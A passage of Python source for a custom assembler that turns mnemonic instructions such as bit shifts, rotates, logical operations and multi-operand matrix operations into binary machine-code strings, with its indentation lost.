machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_bshift(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
if(command[0] == 'bshiftr'):
machine_code_intruction_type = '0100100'
elif(command[0] == 'bshiftl'):
machine_code_intruction_type = '0100110'
else:
error_during_assembly = True
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_brot(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
if(command[0] == 'brotr'):
machine_code_intruction_type = '0100101'
elif(command[0] == 'brotl'):
machine_code_intruction_type = '0100111'
else:
error_during_assembly = True
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_bland(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0101000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_blor(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0101001'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_blxor(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0101010'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[0] == 'blnot'):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format(2**16-1)
else:
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_fin(command, internal_labels, final_pass=True):
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0111111'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def intruction_mmuld(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000000'
machine_code_operand_o = ['00000000000000000' for i in range(8)]
machine_code_operand_b = ['0000000000000000000' for i in range(8)]
machine_code_operand_a = ['0000000000000000000' for i in range(8)]
all_operands = command[1:]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_a[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_a[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_a[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_a[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(7):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[7] + machine_code_operand_b[7] + machine_code_operand_a[7]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def intruction_msqud(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000001'
machine_code_operand_o = ['00000000000000000' for i in range(8)]
machine_code_operand_b = ['0000000000000000000' for i in range(8)]
machine_code_operand_a = ['0000000000000000000' for i in range(8)]
all_operands = command[1:]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(7):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[7] + machine_code_operand_b[7] + machine_code_operand_a[7]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def intruction_mmulm(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000010'
machine_code_operand_o = ['00000000000000000' for i in range(8)]
machine_code_operand_b = ['0000000000000000000' for i in range(8)]
machine_code_operand_a = ['0000000000000000000' for i in range(8)]
last_operand = len(command)
all_operands = command[1:last_operand]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_a[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_a[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_a[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_a[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(7):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[7] + machine_code_operand_b[7] + machine_code_operand_a[7]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def intruction_msqum(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000011'
machine_code_operand_o = ['00000000000000000' for i in range(8)]
machine_code_operand_b = ['0000000000000000000' for i in range(8)]
machine_code_operand_a = ['0000000000000000000' for i in range(8)]
last_operand = len(command)
all_operands = command[1:last_operand]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_o[j] = "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
if(all_operands[i] in internal_labels):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rl'):
machine_code_operand_b[j] = machine_code_operand_a[j] = "0" + "1" + "1" + "11" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
else:
error_during_assembly = True
i += 1
j += 1
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
final_machine_code = ''
for i in range(7):
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[i] + machine_code_operand_b[i] + machine_code_operand_a[i]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code + '\n'
number_of_instructions += 1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o[7] + machine_code_operand_b[7] + machine_code_operand_a[7]
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
final_machine_code = final_machine_code + machine_code
number_of_instructions += 1
return final_machine_code, number_of_instructions
def instruction_madd_subd(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 0
machine_code_processor = '01'
machine_code_intruction_type = '0000100'
machine_code_operand_o = ['00000000000000000' for i in range(4)]
machine_code_operand_b = ['0000000000000000000' for i in range(4)]
machine_code_operand_a = ['0000000000000000000' for i in range(4)]
all_operands = command[1:]
i = 0
j = 0
while((i < len(all_operands))):
if(all_operands[i] in internal_labels):
machine_code_operand_o[j] = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[all_operands[i]])
elif(all_operands[i][0:3] == '*rd'):
machine_code_operand_o[j] = "1" + "00" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
elif(all_operands[i][0:3] == '*rm'):
machine_code_operand_o[j] = "1" + "10" + ("{0:0"+str(14)+"b}").format(int(all_operands[i][3:]))
